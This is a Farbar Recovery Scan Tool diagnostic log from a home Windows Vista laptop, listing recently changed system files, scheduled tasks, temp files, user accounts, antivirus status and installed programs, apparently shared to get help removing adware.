2016-01-17 11:58 - 2015-12-05 12:02 - 00314880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00209920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00158208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00144384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-01-17 11:58 - 2015-12-05 12:02 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll
2016-01-17 11:58 - 2015-12-05 11:41 - 01886208 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01706496 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01539072 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01350656 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01127424 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01090560 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll
2016-01-17 11:58 - 2015-12-05 11:41 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 00819200 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 00732160 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 03548672 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 01571328 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00778752 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2VDEC.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00644608 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00620544 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ADEC.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00352256 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00301056 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00252416 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-01-17 11:58 - 2015-12-05 11:39 - 01074176 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00471040 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2016-01-17 11:58 - 2015-12-05 11:39 - 00278016 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-01-17 11:58 - 2015-12-05 11:39 - 00187392 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2016-01-17 11:58 - 2015-12-05 11:39 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2016-01-17 11:58 - 2015-12-05 11:22 - 00122368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2016-01-17 11:57 - 2015-12-05 12:03 - 00304640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-01-17 11:57 - 2015-12-05 11:39 - 00390656 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-01-17 11:48 - 2015-12-30 11:47 - 04694464 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-01-16 08:53 - 2015-12-15 17:28 - 17892352 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-01-16 08:53 - 2015-12-15 17:25 - 02350080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-01-16 08:53 - 2015-12-15 17:21 - 10938368 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-01-16 08:53 - 2015-12-15 17:20 - 01388032 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-01-16 08:53 - 2015-12-15 17:20 - 00448512 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-01-16 08:53 - 2015-12-15 17:19 - 02158080 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-01-16 08:53 - 2015-12-15 17:19 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-01-16 08:53 - 2015-12-15 17:18 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-01-16 08:53 - 2015-12-15 17:18 - 00816128 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00579584 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00173568 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-01-16 08:53 - 2015-12-15 17:18 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2016-01-16 08:53 - 2015-12-15 17:18 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2016-01-16 08:53 - 2015-12-15 16:50 - 01814528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-01-16 08:53 - 2015-12-15 16:49 - 12388864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-01-16 08:53 - 2015-12-15 16:47 - 00367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-01-16 08:53 - 2015-12-15 16:46 - 09753088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-01-16 08:53 - 2015-12-15 16:45 - 01140224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-01-16 08:53 - 2015-12-15 16:45 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 01804800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-01-16 08:53 - 2015-12-15 16:44 - 00718848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-01-16 08:53 - 2015-12-15 16:44 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-01-16 08:53 - 2015-12-15 16:43 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2016-01-16 08:52 - 2015-12-15 16:43 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2016-01-16 08:08 - 2015-12-05 10:34 - 02799616 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll
2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll
2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll
2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll
2016-01-16 08:07 - 2015-11-13 10:27 - 00013824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
2016-01-15 14:36 - 2016-01-15 14:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2016-01-08 20:17 - 2016-01-16 07:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-26 03:04 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\inf
2016-01-26 03:04 - 2006-11-02 08:33 - 00000000 ____D C:\Windows
2016-01-26 03:04 - 2006-11-02 07:46 - 00758862 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-26 02:57 - 2014-11-19 20:20 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-26 02:57 - 2006-11-02 10:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-01-26 02:57 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-01-26 02:57 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-01-24 03:48 - 2014-11-19 20:20 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-24 03:48 - 2006-11-02 10:42 - 00032544 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-01-24 03:47 - 2015-01-19 10:44 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-01-23 18:07 - 2015-03-18 17:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverUpdate
2016-01-23 18:07 - 2014-12-15 16:45 - 00000000 ____D C:\Users\Barbara\AppData\Local\StormWatch
2016-01-23 18:07 - 2014-12-15 16:41 - 00000000 ____D C:\Users\Barbara\AppData\Local\FinanceAlert
2016-01-23 18:06 - 2014-12-15 16:39 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\ContentExplorer
2016-01-23 16:56 - 2015-03-18 17:46 - 00016152 _____ C:\Windows\system32\Drivers\SWDUMon.sys
2016-01-23 14:01 - 2015-03-17 13:00 - 00000370 _____ C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job
2016-01-21 12:18 - 2014-11-20 07:14 - 00001656 _____ C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job
2016-01-21 12:17 - 2014-11-20 07:14 - 00008002 _____ C:\Windows\System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A
2016-01-20 11:18 - 2015-01-19 10:44 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-01-20 11:18 - 2015-01-19 10:44 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-20 11:18 - 2015-01-19 10:44 - 00003682 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-01-17 12:54 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\rescache
2016-01-17 12:34 - 2014-11-22 10:31 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-01-17 12:23 - 2014-11-18 01:10 - 00000000 ____D C:\Windows\SysWOW64\RTCOM
2016-01-17 12:06 - 2014-11-18 00:49 - 00000000 ____D C:\ProgramData\Microsoft Help
2016-01-17 12:05 - 2014-11-22 10:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-01-17 11:57 - 2014-11-18 20:12 - 00000000 ____D C:\Windows\system32\MRT
2016-01-17 11:50 - 2006-11-02 07:35 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2016-01-16 08:28 - 2006-11-02 10:21 - 00332240 _____ C:\Windows\system32\FNTCACHE.DAT
2016-01-16 07:56 - 2015-05-31 10:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-01-15 14:36 - 2015-11-20 18:46 - 00000000 ____D C:\Program Files\McAfee Security Scan
2016-01-01 18:32 - 2015-01-31 14:56 - 00000000 ____D C:\Users\Barbara\Desktop\Family Tree

==================== Files in the root of some directories =======

2015-01-31 15:51 - 2015-07-22 17:07 - 0000240 _____ () C:\Users\Barbara\AppData\Roaming\wklnhst.dat
2014-11-18 18:24 - 2015-03-20 10:29 - 0000680 _____ () C:\Users\Barbara\AppData\Local\d3d9caps.dat
2014-12-15 16:46 - 2014-12-15 16:49 - 0004424 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistMSI1954.txt
2014-12-15 16:46 - 2014-12-15 16:46 - 0016288 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistUI1954.txt

Some files in TEMP:
====================
C:\Users\Barbara\AppData\Local\Temp\exec.exe
C:\Users\Barbara\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Barbara\AppData\Local\Temp\NullsoftHelper.dll
C:\Users\Barbara\AppData\Local\Temp\uires.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-01-26 03:03

==================== End of FRST.txt ============================

 

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:24-01-2016
Ran by Barbara (2016-01-26 03:07:15)
Running from C:\Users\Barbara\Desktop
Windows Vista Home Premium Service Pack 2 (X64) (2014-11-18 05:42:01)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3355649212-3080085010-2879840853-500 - Administrator - Disabled)
Barbara (S-1-5-21-3355649212-3080085010-2879840853-1000 - Administrator - Enabled) => C:\Users\Barbara
Guest (S-1-5-21-3355649212-3080085010-2879840853-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Out of date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AV: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {3A033352-45FD-579C-DF47-2D2DA7A56A3D}
AS: Microsoft Security Essentials (Enabled - Out of date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {8162D2B6-63C7-5812-E5F7-165FDC222080}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Reader 9.1 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Amazon Links (HKLM-x32\...\{224821ED-CADA-4A8A-AC8D-3734CC0F0931}) (Version: 1.0 - TOSHIBA Corporation)
ATI Catalyst Install Manager (HKLM\...\{190A60F1-2FEE-0A11-7D37-D8607809CC39}) (Version: 3.0.723.0 - ATI Technologies, Inc.)
Bing Bar (HKLM-x32\...\{449CE12D-E2C7-4B97-B19E-55D163EA9435}) (Version: 7.0.619.0 - Microsoft Corporation)
ccc-core-static (x32 Version: 2009.0421.2132.36832 - ATI) Hidden
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.1.6) (Version: 5.0.1.6 - Coupons.com Incorporated)
CyberLink PowerCinema for TOSHIBA (HKLM-x32\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 6.0.2616a - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Direct DiscRecorder (x32 Version: 1.00.0000 - Corel Corporation) Hidden
Dolby Control Center (HKLM\...\{20387B45-18A4-4D48-ABD9-A23D2CBE42B3}) (Version: 2.2.1 - Dolby)
DriverUpdate (HKLM-x32\...\{B2B04F8B-6444-4364-89C8-F3088D4E8D02}) (Version: 2.2.43335 - SlimWare Utilities, Inc.)
DVD MovieFactory for TOSHIBA (HKLM-x32\...\InstallShield_{50F68032-B5B7-4513-9116-C978DBD8F27A}) (Version: 7.0.0 - Corel Corporation)
DVD MovieFactory for TOSHIBA (x32 Version: 7.0.0 - Corel Corporation) Hidden
Generations (HKLM-x32\...\{CB9EA6BB-B653-11D4-B6F6-00105A27284D}) (Version:  - )
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Intel® PROSet/Wireless WiFi Software (HKLM\...\{F22FD942-651D-4EE8-BD6F-7E0AF5E17625}) (Version: 12.04.0000 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lexmark 3400 Series (HKLM\...\Lexmark 3400 Series) (Version:  - Lexmark International, Inc.)
Lexmark Toolbar (HKLM-x32\...\{1017A80C-6F09-4548-A84D-EDD6AC9525F0}) (Version:  - )
LightScribe  1.4.124.1 (x32 Version: 1.4.124.1 - hxxp://www.lightscribe.com) Hidden
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.266.3 - McAfee, Inc.)
McAfee Security Scan Plus (HKLM-x32\...\McAfee Security Scan) (Version: 3.11.163.2 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 43.0.4 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 en-US)) (Version: 43.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla)
MSXML 4.0 SP2 (KB941833) (HKLM-x32\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 and SOAP Toolkit 3.0 (x32 Version: 1.0.0.0 - Webroot Software, Inc.) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
PlayReady PC runtime (HKLM\...\{704ABF63-B0B1-446B-9D92-C5D06AFCE7B6}) (Version: 1 - Microsoft Corporation)
QuickBooks Financial Center (HKLM-x32\...\{890EF3F8-742F-46BD-9E8E-084B3A1F4364}) (Version: 1.10.0000 - Intuit Inc.)
Realtek 8136 8168 8169 Ethernet Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0004 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5809 - Realtek Semiconductor Corp.)
RICOH R5U230 Media Driver ver.2.02.02.01 (HKLM-x32\...\{022CBB38-CEF0-42BA-906A-A49BEFAE0BEE}) (Version: 2.02.02.01 - RICOH)
Segoe UI (x32 Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Skins (x32 Version: 2009.0421.2132.36832 - ATI) Hidden
Skype Launcher (HKLM-x32\...\{BF5A20B4-55F7-49B8-9302-FAC7C459AF3D}) (Version: 1.0 - TOSHIBA Corporation)
Spy Sweeper Core (x32 Version: 4.4.0.85 - Webroot Software) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 12.2.10.0 - Synaptics Incorporated)
TOSHIBA Agreement Notification Utility (HKLM-x32\...\InstallShield_{83892653-9EB8-4192-803E-D987A85CDD23}) (Version: 1.0.11.0 - TOSHIBA Corporation)
Toshiba Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.0.4 - Toshiba)
TOSHIBA Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.08 - TOSHIBA)
TOSHIBA ConfigFree (HKLM-x32\...\{F0A386D2-6E15-4A8F-A04E-87CE9BED0D48}) (Version: 7.4.8 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.0.1.3 for x64 - TOSHIBA Corporation)
TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.00.1.04-A - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.0.2.64 - TOSHIBA Corporation)
TOSHIBA Extended Tiles for Windows Mobility Center (HKLM-x32\...\InstallShield_{617C36FD-0CBE-4600-84B2-441CEB12FADF}) (Version:  - )
